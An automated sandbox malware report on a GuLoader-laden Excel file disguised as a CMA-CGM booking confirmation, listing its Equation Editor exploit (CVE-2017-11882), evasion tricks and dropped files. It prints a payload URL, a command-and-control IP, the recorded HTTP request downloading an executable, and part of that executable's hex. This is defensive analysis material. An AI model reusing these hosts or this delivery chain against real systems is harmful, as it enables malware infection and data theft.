Windows Analysis Report CMA-CGM BOOKING CONFIRMATION.xlsx

Overview

General Information

Sample Name:	CMA-CGM BOOKING CONFIRMATION.xlsx
Analysis ID:	450863
MD5:	1a23b8c8e5fa52a917c92207a8316b55
SHA1:	7b481fe511b2132d2d2dc7cad79aa5ebda0d3388
SHA256:	9584a27702d6f6fdecc4589a5c87b529ef2c41ca556ddf9325999a4bdb58fcc3
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Drops PE files to the user root directory

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Potentially malicious time measurement code found

Sigma detected: Execution from Suspicious Folder

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000006.00000002.2354861374.00000000003B0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_QVwo"}

Multi AV Scanner detection for submitted file

Source: CMA-CGM BOOKING CONFIRMATION.xlsx

ReversingLabs: Detection: 28%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ISOL.pdb source: .svchost[1].exe.4.dr

Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 74MB

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://kinmirai.org/wp-content/bin_QVwo

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 19 Jul 2021 17:39:29 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Mon, 19 Jul 2021 08:52:32 GMTETag: "42468-5c7760eda0fd0"Accept-Ranges: bytesContent-Length: 271464Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b5 9c 66 49 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 03 00 00 a0 00 00 00 00 00 00 3c 13 00 00 00 10 00 00 00 70 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 10 04 00 00 10 00 00 5e 69 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 64 03 00 28 00 00 00 00 80 03 00 e2 80 00 00 00 00 00 00 00 00 00 00 50 10 04 00 18 14 00 00 00 00 00 00 00 00 00 00 00 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 59 03 00 00 10 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 90 0b 00 00 00 70 03 00 00 10 00 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e2 80 00 00 00 80 03 00 00 90 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 180.214.239.39 180.214.239.39

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /disk/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B0A6367.emf

Jump to behavior

Source: global traffic

Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: 3B0A6367.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr	String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4

Screenshot OCR: Enable Editing from the yellow bar above i: I! i T Thisdocument is 3. Once you have enabled editi

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B55BB NtAllocateVirtualMemory,	6_2_003B55BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B55F6 NtAllocateVirtualMemory,	6_2_003B55F6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5724 NtAllocateVirtualMemory,	6_2_003B5724

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B55BB	6_2_003B55BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5852	6_2_003B5852
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B1057	6_2_003B1057
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B78B2	6_2_003B78B2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B48E8	6_2_003B48E8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B28E2	6_2_003B28E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8138	6_2_003B8138
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B513E	6_2_003B513E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4128	6_2_003B4128
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3920	6_2_003B3920
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B19CC	6_2_003B19CC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B423F	6_2_003B423F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4277	6_2_003B4277
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4263	6_2_003B4263
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8254	6_2_003B8254
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5A46	6_2_003B5A46
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5A84	6_2_003B5A84
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2AFD	6_2_003B2AFD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2AD6	6_2_003B2AD6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B22D5	6_2_003B22D5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5359	6_2_003B5359
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B33A7	6_2_003B33A7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B33EC	6_2_003B33EC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2470	6_2_003B2470
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B045E	6_2_003B045E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2C5C	6_2_003B2C5C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3C4D	6_2_003B3C4D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B84A6	6_2_003B84A6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7CA5	6_2_003B7CA5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B348A	6_2_003B348A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7488	6_2_003B7488
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B34EA	6_2_003B34EA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B84E9	6_2_003B84E9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3568	6_2_003B3568
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B35B0	6_2_003B35B0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8DB4	6_2_003B8DB4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2DA0	6_2_003B2DA0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0584	6_2_003B0584
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B55F6	6_2_003B55F6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B25D4	6_2_003B25D4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2E2F	6_2_003B2E2F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B9626	6_2_003B9626
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0618	6_2_003B0618
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8E7C	6_2_003B8E7C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B968F	6_2_003B968F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7EFC	6_2_003B7EFC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B46E4	6_2_003B46E4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8ED8	6_2_003B8ED8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8F40	6_2_003B8F40
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7FF5	6_2_003B7FF5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B1FD9	6_2_003B1FD9

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: CMA-CGM BOOKING CONFIRMATION.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

PE file contains strange resources

Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/17@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$CMA-CGM BOOKING CONFIRMATION.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDA95.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: CMA-CGM BOOKING CONFIRMATION.xlsx

ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: CMA-CGM BOOKING CONFIRMATION.xlsx

Static file information: File size 1215488 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ISOL.pdb source: .svchost[1].exe.4.dr

Source: CMA-CGM BOOKING CONFIRMATION.xlsx

Initial sample: OLE indicators vbamacros = False

Source: CMA-CGM BOOKING CONFIRMATION.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000006.00000002.2354861374.00000000003B0000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00406408 push es; ret	6_2_0040640F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405D8C push es; ret	6_2_00405D8B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00301833 push edx; ret	6_2_00301861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00304833 push edx; ret	6_2_00304861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00303033 push edx; ret	6_2_00303061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00306034 push edx; ret	6_2_00306061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00300038 push edx; ret	6_2_00300061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00301023 push edx; ret	6_2_00301051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00302823 push edx; ret	6_2_00302851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00304023 push edx; ret	6_2_00304051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00307024 push edx; ret	6_2_00307051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00305825 push edx; ret	6_2_00305851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00303813 push edx; ret	6_2_00303841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00302013 push edx; ret	6_2_00302041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00305013 push edx; ret	6_2_00305041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00306814 push edx; ret	6_2_00306841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00300818 push edx; ret	6_2_00300841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00304803 push edx; ret	6_2_00304831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00303003 push edx; ret	6_2_00303031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00301803 push edx; ret	6_2_00301831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00306004 push edx; ret	6_2_00306031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00300008 push edx; ret	6_2_00300031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00302074 push edx; ret	6_2_003020A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00303874 push edx; ret	6_2_003038A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00305074 push edx; ret	6_2_003050A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00306875 push edx; ret	6_2_003068A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00300878 push edx; ret	6_2_003008A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00303063 push edx; ret	6_2_00303091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00301863 push edx; ret	6_2_00301891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00304863 push edx; ret	6_2_00304891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00306065 push edx; ret	6_2_00306091

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: CMA-CGM BOOKING CONFIRMATION.xlsx

Stream path 'EncryptedPackage' entropy: 7.99856683358 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5852	6_2_003B5852
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B78B2	6_2_003B78B2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B28E2	6_2_003B28E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B513E	6_2_003B513E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4128	6_2_003B4128
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3920	6_2_003B3920
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B423F	6_2_003B423F
